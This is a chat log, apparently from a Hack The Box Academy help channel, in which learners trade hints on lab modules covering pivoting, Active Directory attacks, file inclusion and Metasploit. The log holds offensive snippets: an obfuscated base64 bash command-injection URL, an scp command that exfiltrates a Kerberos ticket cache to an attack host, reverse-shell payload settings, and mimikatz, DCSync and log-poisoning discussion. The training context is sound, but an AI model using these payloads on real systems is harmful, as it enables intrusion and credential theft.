#modules
1 messages · Page 63 of 1
i had to reset the machine 5x
eventually worked.......I've had so many problems with machines dying and spending hours not understanding what happened
lol
just had what's likely a pretty serious rule break, what's the best way to get ahold of moderators?
DM an active mod
Well hopefully someone sees that
anyone else having issues with Remote File Inclusion in file inclusion. The pwnbox display cuts off a lot. And none of the commands on the page work. I put any of them in the box and it gives me a connection timed out. Same thing if I vpn and try it in my vm
Am I supposed to use a custom version of mimikatz for the AD skills assessment module or am I overthinking?
I uploaded mimikatz 3 times with wget from different places but none of them run even with disabled av
I am trying to view the source code for an upload.php file, and I'm currently unable to figure out how to find it. I've tried uploading an .svg file on a file upload form to be able to read the upload.php source code, but am unable to think of a way to view it. If anyone could help it'd be greatly appreciated, just send me a DM
no, I had no issues
@thorn urchin Where did you get mimikatz from?
I've been trying all sort of ways but it doesn't run for me
Did you use .exe or invoke?
I used the .exe
when I did this it literally just didn't work and was broken, I just used different stuff entirely
can always try snagging the one from one of the sections C:\tools
Thought of that
But it's such a hassle D:
But it would save me time xD
Even with the snagged versions it's bugging out for me
Is it because I'm using a powershell reverse shell with nc?
It's what I always do ..
¯\_(ツ)_/¯
but if the section version doesn't work then it's def something about your setup that's messing with things
try using the cmdline options instead of interactive and redirect output to text file
ok, learning the fundamentals of linux and I'm trying to find a file name, but when I try to ls the return I get an error
anyone know what i'm doing wrong?
long story short, i'm trying to answer this question
nevermind, realized i forgot the "\; 2>/dev/null" at the end
Time to go get breakfast
hey all, can someone provide a nudge for the following question: After escalating privileges, locate a file named confidential.txt. Submit the contents of this file. Module: Windows Privilege Escalation - Skills Assessment Part 1 - what I've tried so far: findstr (various methods) did find a file called backups - however no access to this directory, but I do not think this is the correct way to go about it.
You can type keywords in the windows search bar but not sure if that's intended method of searching
i did try this, but only with the whole text. Will try as keyword. Thank you
other method finding files with cmd
dir /S /B file.txt
I think it searches recursively from directory you're in and under
PERFECT, that's what I've been looking for! I knew there was a search command in CMD, and every time I typed alternatives for findstr in windows into google, it wouldn't show. I shall try this now
@shadow canopy I appreciate your help, it has found the txt file. thank you kindly.
np
Module Pivoting, Tunneling, And Port Forwarding - SKILL ASSESSMENT :
- Question 6: "For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation"
Need a nudge for this, I dumped the ||lsass|| from ||mlefay win machine|| and found a cleartext psw for ||vfrank||. Tried to directly access via mstsc.exe to || vfrank at 172.16.6.35 from the mlefay 172.16.5.35 win machine|| but ended up in the same machine with just the new user, didn't manage to pivot to the actual machine, any help? kinda confused
||the ip x.x.6.35 is a rabbit hole||
maybe is the ||x.x.6.25?|| cuz i just found that rn
yep
hint:|| port||
yay, did it! thank you
no problem ^^
could anyone @everyone help me out, what will be the key input for the capture the flag :hackweek event which is going to start on 23 March.....i couldn't join cause it's prompting for an input key to add
if you don't have it, then you cannot join
how to get that
only the organizers can give you the key
Hey everyone! I could really use some help with a Twig SSTI challenge. For some reason injecting {{_self}} or {{_self.env}} errors out. I am failing to retrieve the environment variables
I need help with Attacking SQL Databases please DM me
Can someone give me a pointer for the last question in Active directory Skill assessment 1?
Did you run mimikatz with enough privileges?
I ran it as admin and privilege::debug gives 20
Did you token::elevate?
Also there could be an issue with the version of mimikatz
Sometimes using an older version works
I got a problem with section Web Server Pivoting with Rpivot in the module Pivoting, Tunneling, and Port Forwarding. The command proxychains firefox-esr 172.16.5.135:80 doesn't work for me. I get a lot of errors and firefox won't load that page, even though the rpivot server-client connection has been setup properly and is running. Instead of proxychains firefox-esr 172.16.5.135:80 I used curl: proxychains curl http://172.16.5.135:80 which gets me the page. I saw a fragment which probably is the flag: || I_L0v3_Pr0xy_Ch@ins||, but it's not accepted as the answer. I can't see anything else with curl.
Got it. Had to copy/paste the flag from the curl output to notepad and from notepad into the answer field. Probably some unicode error.
Any help with Hacking Wordpress, the very first assignment, I'm supposed to look through directories mentioned in the instruction for Flag.txt, went through all of them (only like 2 worked) and cant find anything EDIT: 'Manually enumerate' yeah right, bs instruction as usually
Hi guys I am solving the module Password Attacks and the section Pass The Ticket(linux). In the optional exercise the question is "Transfer Julio's ccache file from LINUX01 to your attack host. Follow the example to use chisel and proxychains to connect via evil-winrm from your attack host to MS01 and DC01. Mark DONE when finished." I am using the following scp command "scp /tmp/krb5cc_647401106_HRJDux kali@10.10.14.161:/home/kali" But i am not able to transfer the ccache file
if you take a screenshot of the directories mentioned in this section https://academy.hackthebox.com/module/17/section/41, and then try each of them out...do not forget the end with a "/" otherwise you may get funny results
has anybody finished XSS please? I want to ask about the phishing part, I'm stuck there and don't know what to do at this part, confused how to get the flag
Hi,
I'm stuck in socks5 tunneling with chisel in the pivoting module.
When i want open chisel on the pivot target i have this error :
ubuntu@WEB01:~$ ./chisel server -v -p 1234 --socks5
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
I see we need to install libc6 :
sudo apt-get install libc6
But it's not possible on the target host.
Anyone have another solution ?
Download the binary (I think version 1.7.4 worked for me)
Thanks but no it's the same ...
I am having trouble with ACADEMY-EA-DB01 host (172.16.5.150) is it working ?
I need the last flag of privileged access section
I tried many versions and it is exactly the same result for each.
Regarding "Skills Assessment - File Upload Attacks". I'm not finding any way to come up with a POST request. I believe the ||image upload form|| should be the target, but I can't really do much without any POST requests. Any help?
EDIT: FFS... It seems that the browser in the pwnbox somehow filters the POST request through. Tried with my own VM with no troubles at all. Once again spent an hour trying to figure out a thing that wasn't even a thing.
mm, as far as I remember, use the chisel 1.7.4 binary on the HTB machine, with their respective configurations, and for the attacker's machine use the latest version of chisel
I just saw, on the forum they also advise the version 1.7.4 but for me it gives me the same result.
I am completely blocked ...
I try other techniques to recover the flag but nothing works
scp ~/Tools/chisel-1.7.4/chisel ubuntu@10.129.114.95:~/
ubuntu@WEB01:~$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
hi guys i need help with Pass the Ticket(Linux) Optional Exercise
what binary are you downloading?
1.7.4 & 1.6.0
and the name of the file?
I downloaded the zip with the 1.7.4 version and built it as indicated in the course
cd chisel-1.7.4
go build
scp ~/Tools/chisel-1.7.4/chisel ubuntu@10.129.114.95:~/
ubuntu@WEB01:~$ ./chisel
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.32' not found (required by ./chisel)
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
nope you don't have to download the .zip, download chisel_version_linux_amd64.gz
and then you make the transfer
do not build this version of chisel on your machine
The same
Oh wait, it's good! I'll try to continue!
Hi, I'm doing the Getting Started module. I've been able to do the manual way, but for the life of me, Metasploit doesn't work. LHOST is pointed to tun0:4444
All is good !
Thanks a lot !
Always good advice !
no problem ^^
did you actually put it as LHOST tun0:4444 or LHOST tun0 LPORT 4444
can anyone help me out i am stuck here in this module
https://academy.hackthebox.com/module/109/section/1042
http://139.59.189.170:31454/index.php?to=&from=696212415.txt
bash<<<$(base64 -d<<<bXYgJHtQQVRIOjA6MX1mbGFnLnR4dCAlMDkke1BBVEg6MDoxfXZhciR7UEFUSDowOjF9d3d3JHtQQVRIOjA6MX1odG1sJHtQQVRIOjA6MX1maWxlcyR7UEFUSDowOjF9dG1w)&finish=1&move=1
its says malicious request denied
Hey, I am currently at the Knowledge-Check of the getting started section. I found the admin credentials and was able to log in as admin.
Also, I found an exploit on MetaSploit for GetSimple v. 3.3.15:
exploit/multi/http/getsimplecms_unauth_code_exec
My options are:
Module options (exploit/multi/http/getsimplecms_unauth_code_exec):
Name Current Setting Required Description
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.114.223 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the cms
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
LHOST 10.10.16.3 yes The listen address (an interface may be specified)
LPORT 1337 yes The listen port
When I run this exploit, I get this:
[*] Started reverse TCP handler on 10.10.16.3:1337
[*] Exploit completed, but no session was created.
Can somebody give me a hint what I might be doing wrong / should (re)consider?
I'm working on AD Enum&Attacks: Attacking Domain Trusts - Child -> Parent Trusts from Linux. I'm trying to get the NTLM hash for the domain admin bross. I've created a golden ticket. I can login to the DC with psexec, but I can't get secretsdump to work to grab the hash. Shouldn't I be able to do a DCSync with secretsdump?
I think I figured it out. Anyone else that may have this issue, the golden ticket seems to expire after a short time and you may need to run secretsdump shortly after generating the golden ticket to have it work
I personally didn't go the metasploit route, but if meterpreter isn't working you could try a simpler payload option, which will fix it sometimes
I believe there are multiple exploits that show up when you search for getsimple, make sure you are using the right one
Thanks, I found my mistake: I used the wrong LHOST, I unknowingly had two openvpn connections running
Thank you, I now have the meterpreter shell
1v1 what?
cyber mayhem
ok
Don't question him
.
yo, this channel is for module and academy discussion only
yes, i believe so
Hey, just joined. I'm having a problem with the "starting point" submit root flag. Hopefully I put this in the correct thread
hello and welcome, just a quick one, for future reference for any issues you are having.... provide the full module name and the section including the question (and sometimes even a link) as it is easier for others in here to provide help. Best of luck on your journey
anyone know the userlist for Attacking Common Services - Easy
starting point has nothing to do with modules or academy, they're just flat out in the wrong channel
I know it's ||smtp|| but the resources provided aren't working
idr which method was the correct one. Id have to go back and redo the section
but only one of the three ways it discusses will work
three ways you mean like RCPT, VRFY, etc.?
ye
great thanks
whilst i agree they may possibly be in the wrong channel ("Getting Started" is also a module on academy so i was unsure what the question exactly meant), nevertheless and more importantly once the user gets to the correct channel they will be aware how to best post a question so it can be answered easily.
Hi, i keep getting this error when trying to add damundsen to the Help Desk Level 1 group in AD Enumeration & Attacks, and it's just so hard to troubleshoot a lot of this active directory stuff
At C:\Tools\PowerView.ps1:11684 char:17
+ $Group.Members.Add($Member)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : PrincipalExistsException
include your full command, just the error is kinda useless to us.
Also for formatting you can enclose it in triple backticks ` it makes it more readable.
c:\ mypowershell.ps1 -Argument args
Ok idk discord formatting ty
Command was `Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2`
sounds like the user has already been added to the group
seriously? but that was the first time i did the command, let me scan the members rq
active directory stuff is so hard for me to troubleshoot on my own because google does not help
AD ain't easy, this module is widely regarded as the hardest module in the path for good reason, and it's not because of the quality
ty makes me feel less bad for struggling
there's an AD fundamentals course on academy as well that takes you through actually configuring one and stuff that may be worthwhile. I haven't done it but I've considered it.
hello. Do I need to register another account for the academy part of the site?
yea
Hi, could anyone give me ideas for Attacking Common Services - Easy? Tried bruteforcing all the services with the resources list and for now found nothing, enumerated port 80 quite well but I don't think that is the exploitation way, port 443 is http simple auth, which I haven't tried via that port yet. In conclusion, what should I try next? Thanks in advance
unfortunately my notes are sparse on that one, but those labs ratings are out of order. the Easy one is actually the hardest lab. So if you get too frustrated go clear the medium and hard labs first.
ok
Enumerating ||HTTP or HTTPS should reveal a user with that user try bruteforcing the other services||
I am doing parameter fuzzing and I am trying to run the following command, but I am not getting any results (https://academy.hackthebox.com/module/54/section/490)
This is the command: ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://IP:PORT/admin/admin.php?FUZZ=key
But this is not working and I'm not sure why
remove the slash after ip
I did, it puts it there on discord, not sure why
Could I ping someone for some assistance w.r.t. AD Enumeration & Attacks - Skills Assessment Part II?
Specifically, Q8: Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.
screenshot?
I think the issue is that I need to scan admin.academy.htb but idk how to get the ip for that
I used subdomain fuzzing to find that it exists, but I can't locate it, so I'm guessing I need an ip to add to my dns?
Take a close look at the output from the NMAP scan.
you fuzz using the IP that you are provided with
Ok let me try
multiple sites and subdomains can exist on the same IP after all
How do I access the other site on the same domain? I don't understand
@thorn urchin
It just returns the same ip when I get a hit
that's not a problem
that's how vhosts work
just again, it may not be a real site anyways
so if you don't get anything even after adding to /etc/hosts it's possible it's because there's nothing to get.
here's more info on the topic
it's one of those foundational pieces of knowledge the modules assume you already know
Is there a specific discord channel to discuss pro labs in particular Dante? Thinking about starting that one
Imagine trying to finish the assessment on SNMP and the provided IP address does not have pop3/imap/snmp open. HARD Reset
Also. Now that I reset the instance, the same syntax I used to answer Q1 no longer works (which worked previously)
ohh thank you
Ok. Yeah. Anyone else having issues with Attacking Services - SNMP?!
Ports are open, I go to brute-force for valid user, they close.
try slowing down your threads for brute forcing :)
Showcased tool and intended tool don't have threading
I guess processes is threading. It worked first time just fine
Is there anyone that could grant me some assistance w.r.t. AD Enumeration & Attacks - Skills Assessment Part II?
I have compromised SQL01 (SYSTEM priv), I have the Administrator's hash and found a password Su...rE, but I don't know what I'm meant to do from here to attain Admin privileges back on MS01.
Can anybody explain why my windows firewall is detecting a Backdoor:PHP/Remoteshell.F on the SQL injection fundamentals cheat sheet download
Or more if anybody else is having that problem
Defender detects the PHP Webshell
I had this issue today, contacted support they assured that it's ok. It's just due to the code snippets in the file
^ defender is doing its job as the code snippet - indeed - would be considered a backdoor if used maliciously
I checked later that it's safe, i was just baffled why it gives the error
Thanks for the info boys
this is why my notes and things are in a folder that I've whitelisted for defender
Has anyone completed File Inclusions Skill Assessment? ||I've searched the website and could only find the p... parameter and a m...... parameter but couldn't exploit them... I tried fuzzing for other php pages and then fuzzing those for parameters but nothing|| any hints? ||fuzzing for post parameters but nothing yet||
Thanks for this
It would suck if your notes suddenly disappeared because defender was just doing its job
|| mimikatz || is your friend
Try || to read the PHP code ||
Read the PHP Filters section
Woops bunny was faster
ahh I see thx!!!
Not sure I follow. I used mimikatz to pull a plaintext cred for a user "S...E" but it didn't apply to anything I could find.
It does, youre on the right track
Hi again! I remember you saying the same. I took a 2 week break and am trying to re-approach the problem again.
Ye, that password IS used somewhere, unfortunately just no way to tell you where without just spoiling it.
On the skills assessment for Active Directory Bloodhound, "Find the percentage of users with a path to GLOBAL ADMINISTRATOR" -- how? I conceptually knew what I was trying to do (neo4j cypher query wise, but failed), brute-forced the value, back-tracked to how it is derived, but still (a) can't figure out a query that would generate it for me (even though I do have queries that will generate a %), and (b) can't figure out how to automatically calculate the numerator of the equation (I can look in bloodhound and manually count)...
Check out this cheat sheet
https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
Yes, I am familiar with that cheatsheet, which (among other things) shows how to automatically calculate a %... but I still can't figure out a query for calculating the numerator of the equation (# of users that connect to global administrator)
Check the nodes. || You must use the Azure nodes.||
okay I'm on the last step of the File Inclusion Skill Assessment and I know what I have to do... only problem is, does anyone else's lab instance die immediately ||after doing a log poisoning attack? I can successfully poison the logs, but shortly after executing a command like id the lab crashes||
Restart the Lab
well I have to, it crashes and that's the only option, but during the section from earlier it did that as well. It crashes as soon as I execute
poisoning logs is pretty risky and error prone, you gotta have a perfect payload for the target or else it's gonna fail, at minimum brick the exploit path if not the whole web app, and ya gotta reset the environment
Swear I did all that, but in re-putting it together, it now works, so thx
its usually my option of last resort.
@thorn urchin ...oh my lord. Shoot me in the face...
And here I was going "bUt I aLrEaDy SiGnEd In To MsSqL..."
but that's the only way to solve this lab I believe
A breakthrough, but an embarrassing one. Thanks for humoring me
hey you got it though!
could I DM someone about this I swear it's the labs fault but I want to confirm
it is, I'm just saying expect to brick it a lot debugging it
well it's not even bricking atm but the logs aren't populating. I'll try another restart
this is so frustrating
OMG FINALLY
that was such a pain
remember if the box itself isn't bricked you can check the error.log to see the php error message about what went wrong.
I did forget about that, but the issue was mainly the box dying lol
Password Attacks - Medium: I am stuck trying to get root. I am logged in as d*****. Looked at .bash_history and rsa keys..but I'm not having any luck...any hints would be appreciated...
AD Enum and Attacks - LOTL utilizing techniques learned in this section find the flag hidden in the description field of a disabled account with administrative privileges.
anyone up for some help?
Hello, I am new to hack the box and am running into a little issue on my terminal. Can anyone guide me in the right direction?
May I have some assistance with Pivoting, Tunneling, and Port Forwarding - Skills Assessment Question 6?
When I RDP into the found 172.16.6.XX with found users credentials from previous questions the machine has the same folders/files/flag as question 4.
I'm a little lost.
Disregard - I figured it out. Thank you guys anyway.
hi
case 5 on the sqlmap module, i was able to get the flag but it doesn't seem to be accepting it. anyone else having this issue?
nvm, it replaced one of the letters with } but i was able to make a decent guess as to what it was
if that's one of the time based ones then yeah, sometimes it just isn't perfect and you have to do a little human guesswork
yea it was one of the OR time based payloads.
yup normal issue with that vuln type
I think its not called csrf-token on the assignment ( not at home so i cannot check my notes) @naive sky
so what should i do?
I am running into a problem with how to use some tools with the IP:PORT format for the target machines. For nmap I have tried a few combinations but they are not working for me, saying host down or cannot resolve. For example "nmap -p- -sV -sC 173.43.23.140:30921". Am i missing something?
I have tried looking at examples but they use IPs without the :port so not sure if I'm doing it wrong
-p- scans all 65535 ports, if you want to be port specific, be like -p$Portno. e.g say I wanna scan only smb and netbios : -p445,135-139 ... there is absolutely no need to use -p- and -p445,135-138
that port is the docker ip right? I don't wanna scan that port, but how do i connect to it
it's what i enter into the url and when i just use the IP nothing
the target ip is given to me as x.x.x.x:30245 for example
that's what's confusing me
Read it from the code.
You could specify what section you're in so someone can better understand how to help, but from experience since starting academy, only a specific service runs on a docker host on a port and that's the only service of interest for the specific assessment, in which case there is no need for a port scan because that's the only port you're asked to carry out the task on.
Ahhhh that makes sense. I'm doing pentesting basics, public exploits.
In my mind i access the target through IP:PORT and then once there the machine still has all the normal ports. So I was a little confused. Got it now, thank you!
Hello, can someone help me with this module, I'm doing password attacks where i need to bruteforce an ssh login with a custom wordlist. It has 94k words so it takes like 3 hours to fully bruteforce the login. Can someone give me the first letter of the password so the bruteforce will go a little bit faster?
filter the words that start with 'B' and create an additional wordlist based on that
Active Directory Assessment 2 ""Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What is this user's account name? "" I found the username but i am stuck on finding/dumping the hashes
Any suggestions?
with genericall you can force change a user's password
@autumn pilot yes, but if i do that it's gonna change the hash, and the question asked is Crack this user's password hash and submit the cleartext password as your answer.
i did a bloodhound sweep and was able to get the username C****
nvm got it
Having the same problem right now. Did you manage to find a solution?
version 1.7.4 finally worked
Nvm, got it working.
I downloaded 1.6.0 and it worked immediately.
They should really update this box.
Hello guys, does somebody know if i can use proxychains with the vpn of htb?
it is explained in pivoting, tunneling and else module
it is so harder
Yes.
Trying to run WPScan on the target of the WordPress Skills Assessment, but getting: Scan Aborted: The remote website is up, but does not seem to be running WordPress.
Shouldn't they put WP website on the WP skills assessment
you need to find it
Can you give me a little pointer, is the link in the source code supposed to work? B***.inlan****.loc***
Okay I think I figured it out, failed to add it as a host at first but tried again and succeeded, thanks for the help
While you're at it did you get ptunnel-ng to work? autogen.sh is riddled with errors.
question: I am working on the "Firewall and IDS/IPS Evasion Easy Lab". There is a status page given to me that displays how many 'recorded alerts' the system gets. Before i start doing anything i have 16 alerts and the number grew to 100 in just a few seconds (i refreshed the page a bunch) and I was 'banned for 3 minutes'. But I did not even begin to run my own commands. Is this normal?
you need to install autoconf as it is written in the error
guys im having problems downloading the openvpn
No. It's all whole bunch of other shit. Will see if installing those solves anything.
In my case it worked
see if this helps, https://help.hackthebox.com/en/articles/5185536-connection-troubleshooting
thx
Yeah, didn't work. Instead i just used Chisel again and got the flag that way.
I'm stuck on the skill evaluation - Pivoting, Tunneling and Port Forwarding.
I got the lsass.dmp file and recovered the hash of vfrank on my kali but I can't find a wordlist that works to crack the hash
anybody an idea why this error occurs?
I used|| mimikatz|| and saved myself from performing those lsass steps
So you uploaded mimikatz on the windows machine?
Anyway the password is on the forum but I should have used mimikatz directly instead of getting the lsass.dmp file.
Now i try to use ntsh.exe but I'm a bit lost on the ip to use with all the port forwarding
yep, performing the file transfer.
For the second case you have to search for|| x.x.6.x|| ip addresses, be careful because there is ||1 which is a rabbit hole||
Hello can any one teach me how to post code on here correctly? Please
Hi guys, can anyone explain what Security Least Access is, I don't understand
Can i DM you ?
I'm mixing everything up and I can't think straight anymore
sure, no problem
Yo, I'm stuck on the first Pivoting one. How do i enter rdp? I tried following all the steps from the module but i don't get it
Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag? I've re-encoded the cookie as the "super user" and it still does not allow me in, what might I be missing here?
I'm in but don't have the flag so I'm confused what to do at this point
most likely it's expecting you to use things like; curl, whatweb, or firefox to enumerate and look at the webpage
if it's a docker image you generally cannot nmap those
Module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
Section: Kerberoasting - from Linux
Question: Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.
I tried the commands on that page, but it asks me for a password in order to get those TGS tickets. Am i supposed to dump some hashes and crack them?
if you're using kali or parrot; openvpn is already installed
I got stuck in first module/Vulnerability Assessment. The question is: "What type of analysis can be used to predict future probabilities? " and my answer was: "Predictive Analysis". It would be great if someone can help
try taking off the word "Analysis"
I did that and it worked, I think a space ruined it when I copied it the first time. Thank you!
lol
Skill assessment stuck
haven't done that; don't just reply to me on something unrelated to your issue
Somebody done that?
if you're stuck, reread the module and double check you're doing everything right instead of just copy/paste
I have read it
But I got stuck which tamper to use
There are a lot
It's not effective to use them one by one
then keep trying while you wait for someone to assist you
But the chat would be gone
it still exists
How could someone know?
the chat doesn't just "disappear"
Anyone here completed the CrackMapExec Module ?
people will scroll up and read if they are wanting to help; i know a handful of people that just lurk in here JUST to answer questions
but you're also banking on complete strangers as well to just help you out
also your questions in the past have been bad questions. You're either restating the exact question from the module or not giving enough context to actually get an answer, so most people don't bother to even try (which sucks, I know).
zegaf its going to be okay I asked a question a while ago and if nobody answers I'm just gonna keep working on it and try to figure it out. If nobody responds in an hour I might repost it but no need to spam
Yes its frustrating sometimes and sometimes we just want immediate help and answers but I promise it will be okay.
fully read this webpage: http://dontasktoask.com/ it talks briefly about rephrasing a question to get the answer you are wanting instead of beating around the bush. https://stackoverflow.com/help/how-to-ask there is also this effective link; alongside this slightly longer article: http://catb.org/~esr/faqs/smart-questions.html
while I will just simply paste/type in http://dontasktoask.com - it's not 100% to be a dick about it, it's a way of saying - take a look at this, then at your question and ask yourself - is this phrased in a way that would get me my answer
there is also a link on the dontasktoask page to something known as the xy problem, which I also recommend taking a look at
I'm still stuck on the first section of pivoting, tunneling and port forwarding. I don't get what i am doing wrong, i tried everything step by step but it doesn't work. any tips?
as long as your proxychains conf is correct, you will be good to go
^
just make sure your proxychains.conf file is correct
you may need to comment out the other proxy mode - not sure if that plays a role - but I had issues when I had both of them on. But it could just be that my vm was being weird
what does "correct" mean?
if you are trying to use port 9050 within your ssh command and that port is not configured in your proxychains conf, then it will simply not work
correct means that in your /etc/proxychains.conf file if you do
tail /etc/proxychains.conf you see
socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
if you're on the first section then at the moment I believe they only want you to do the socks4 9050 - but what is that section called so I can take a look?
Dynamic Port Forwarding with SSH and SOCKS Tunneling
but my in my proxychains config i just have
socks4 172.0.0.1 9050
then edit the proxychains.conf
yeah i did multiple times
because it should be 127, not 172
oh yeah i mistyped sorry
anyway what are you saying is going on that is making it not work?
Hi everyone, just need a clarification regarding the test in the Metasploit module about payloads. How can I guess that the remote machine is running Apache Druid only knowing this nmap report:
$ nmap -sV -Pn -p-10000 10.129.203.52
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-15 17:04 CET
Nmap scan report for 10.129.203.52
Host is up (0.025s latency).
Not shown: 9993 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
2181/tcp open zookeeper Zookeeper 3.4.14-4c25d480e66aadd371de8bd2fd8da255ac140bcf (Built on 03/06/2019)
8081/tcp open http Jetty 9.4.12.v20180830
8082/tcp open http Jetty 9.4.12.v20180830
8083/tcp open http Jetty 9.4.12.v20180830
8091/tcp open http Jetty 9.4.12.v20180830
8888/tcp open http Jetty 9.4.12.v20180830
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.39 seconds
I've seen that Apache Druid uses Apache Zookeeper, is there an information here telling me that the remote is running Druid ?
you can also try doing whatweb <IP>:port
sometimes it's either just knowing services or google
Indeed! Thank you very much
... how can you proxy if your proxy isn't open xD
yeah that's why I thought of putting in the ssh server
in the proxychainsconfig
but now this makes more sense
It's always the simpler way
could be because you have a tiny space at the end, or its for a different question
wrong flag for that question?
Log out and log in?
refresh?
same
is flag format correct? space may throw the validation
its correct, but says incorrect
Ok, PEBCAK.
Stuck on Password Attacks Medium Lab.
Unable to take advantage of ssh keys found with user d***** . Read through most of the previous hint. Going nowhere.
Would be great if someone could assist (DM).
you do a lot of back and forth in the labs i take it the ssh key is password locked? If only there was a way to crack it
its correct, but says incorrect
idk, I cant fix it for you, maybe its a bug on their side?
I've had it say the flag was wrong a few times, I just kept submitting until it accepted it
@fathom pendant
Indeed. That was my first approach. Used john, hashcat, etc. from the modules with the resources list and other lists. Nada.
So, looked at the history of the user and attempted to mimic it for ssh. No go.
hey guys im on the attacking common services module and trying to do the mssql stuff. I have a password for mssqlsvc, but can't log in to see flagdb. Can anyone help :)?
empty
really disappointed
I think I had this before and restarted the machine... I can't remember though because I did it a long time ago before I started taking good notes
I've had to reset stuff a bunch dont be afraid to mark down how you got there and just reset it. Super frustrating at times I 100% feel you but dont be afraid to reset shit or you will spend hours getting nowhere like me
@fathom pendant
Nevermind; figured it out!
hi guys i am
Guys how do I start vpn on windows?
Have you finished?
Did you understand from the picture
ok
How do i use the (new) cloudflare WAF Firewall bypass on Metasploit Kali Linux?
what module
hey guys, How Can I reach out to HTB Academy via email? When I try to log into the academy, asks for 2FA OTP code, But I dont have access to it anymore
Anyone able to help with the SQL Injection Fundamentals Skills Assessment? Found the directory I can write to, and read the source code for index, dashboard, and the config file but unsure of where to go next. EDIT: nvm. figured it out. There was something I thought I tried earlier that ended up working. Sigh
Can I access to it without being logged in?
yo guys
why are you trying to run the vpn on windows; you should be running the vpn on your virtual machine not your host
i'm having some trouble with file upload attacks -blacklist filters nvm... I swear I tried this filter earlier and it didn't work but second time it did
lol i was gonna suggest to try one of those in the ||pics in that module, maybe with some more thing added||
thats pretty spoilery
like this? haah
the goal of the section is to learn the methodology of finding the answer, so telling someone the answer defeats the point.
no, like you shouldn't have it even in spoiler tags
my bad, I didn't think it could've been that spoilery
in some other modules it might not have been, but this one heavily focuses on the process of discovery, so telling a working extension skips the point.
be like on the enumeration module telling someone what high level port service they missed instead of how they could've found it.
yeah that might be better lol
hahaha yeah
Having some dumb trouble ran out of time doing last question on wordpress assessment. I have switched out my /etc/hosts/ for the new IP and i'm not able to get back in
of course after I post it immediately works lol
nvm
sometimes parts of the lab take a little longer to spin up
I'm doing the **Active Directory Enumeration & Attacks** module, I'm at the Kerberoasting with Linux section and I didn't understand if I first have to find some hashes somewhere else and crack them before trying the suggested tool in this section. I mean I tried it but it prompts me for a password for the Windows user which I don't know.
the exercise is this: Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.
I don't remember for that one specifically, but some of those sections expect you to rely on creds found in previous sections. You can tell if they're reusing the same user in the section examples for the attack.
thank you i'll double check that later
hi
madf0x is right... for all of AD I'd recommend writing down any user:pass combinations you find, because you will need them
yeah gonna check all the ones I've already found, thanks
there should be a mentor to help with student problems like what I faced here
This is included in the Silver annual subscription.
https://academy.hackthebox.com/news/7-dec-2022
so sad
In attackng web apps with ffuf>DNS Records, it describes setting academy.htb to the ip in etc/hosts, but then it goes on to say that we now get the same web site with academy.htb that we got with the IP, so it seems to conclude that this proves that academy.htb is the same domain we've been testing. But we set the IP in hosts. How does this prove it?
Do not be sad.
If you ask your question here in the chat, I am almost sure you will get appropriate help.
Sorry, I don't quite understand the question.
But a domain is not equal to IP address.
If you put an IP address and a domain in your hosts file, then your PC will be able to resolve the domain.
What module, section, and question are you on?
My question is that I don't understand what the section is trying to outline. It seems to be making the case, after we set academy.htb to an IP in hosts and accessing academy.htb, that this proves that academy.htb is the same domain we have been testing so far
However, we get the same website we got when we visit the IP directly, so academy.htb is the same domain we have been testing so far. We can verify that by visiting /blog/index.php, and see that we can access the page.
It may be that the web server is configured to serve the same website on the IP address as when you make the request via domain.
But this does not have to be the case.
You can run multiple websites on one IP address (VHOST).
I understand VHOSTs, but I don't understand the section and what it is trying to say. Is it related to vhosts? It doesn't talk about them at all
The section tries to explain why you need DNS.
In the module, the web server is obviously configured to serve the same website via IP and via domain.
And how did we determine that the IP is the same domain as academy.htb?
when we set the IP to academy.htb in hosts
The message "admin panel has moved to academy.htb" was displayed in a previous section
An IP is not a domain.
ok, I still don't understand what that section is trying to convey
That is the verbiage from the section
It's just a matter of understanding that IP is not the same as domain and how a domain is resolved.
bro for the fuff you just need to add any and all vhosts to the /etc/hosts file for the IP. it will save you a lot of time
Then how do we reach the conclusion that they are the same?
ffuf*
I'm asking about the DNS Records section
I don't understand how they reached the conclusion they did
Because in this case they are identical.
The web server delivers the same website with http://10.10.10.10 as with http://hackthebox.htb.
here's a little experiment for ya: change the /etc/hosts line to notarealdomain.com and tell me what happens when you browse it.
Cause it very well could be that their example for what they're trying to explain is bad, but this test will make it clearer if that's the case or not.
